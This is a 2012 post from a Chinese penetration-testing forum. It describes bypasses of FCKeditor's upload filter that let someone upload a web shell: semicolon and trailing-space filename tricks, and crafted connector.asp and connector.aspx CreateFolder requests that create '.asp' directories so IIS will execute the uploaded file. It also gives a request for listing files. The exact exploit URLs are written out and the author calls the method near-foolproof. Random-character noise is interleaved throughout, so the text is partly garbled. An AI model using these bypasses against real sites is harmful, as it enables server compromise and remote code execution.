中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]
作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
; @9 K% s# z! z1 h0 w
8 `) n: s5 K) G. S0 k. {4 o提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。, }6 k: z0 s9 m
  l$ @% Z; M1 ]% P- Z# K/ {
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。% W  l, B2 W( o% D0 g# n' Y
& a/ h/ ]: k! Z- l9 W
突破建立文件夹:. k0 O, X" u6 C7 H1 p+ ^
7 M- ]( _; Y+ ^' k6 }) o
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
$ R  U2 M3 V* s/ F8 `: h" ^3 g' R+ P# {- S9 l1 i0 \' s9 J
参数:
+ s7 ^+ ]2 p) q0 [4 g/ d" Y
/ n' c. Y0 \/ L当前目录名:CurrentFolder=/qing.asp9 q) L( I% P- R* |

- p  V2 m8 t6 U: s新的目录名:NewFolderName=x.asp( h) ?, [3 i. B: G/ r' ?

. {2 i. M; ?- I$ J- u- w% \7 L其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……9 ^  ~7 E. A& L" G+ ~( I& s

/ r6 U$ a* V; V! h' U; w! z5 q: ]那么 x.asp 就已经建立生成了,此方法百试百灵!
2 o# i; N# v6 m& U0 t4 j. m% k' ?# V3 P
1 z6 ]( }7 _0 n* B新建文件夹参数 x.asp,基本都能搞定。3 U* U) q' [. ^- ^: {5 t
- G! ?$ b6 C, }8 I) j
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
% Q/ N' z) n- [, C( g# V, C( ~0 o( L2 ^* B
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp3 Y/ a- X% [# w8 N5 m/ I! b
# h0 }! D  H8 W2 L8 m* j
获取文件列表% o, a9 z8 S: b7 l% G1 o
       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
4 C. F3 e! ^8 ^3 H0 S& k3 T
8 T5 Q) x3 _* w



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2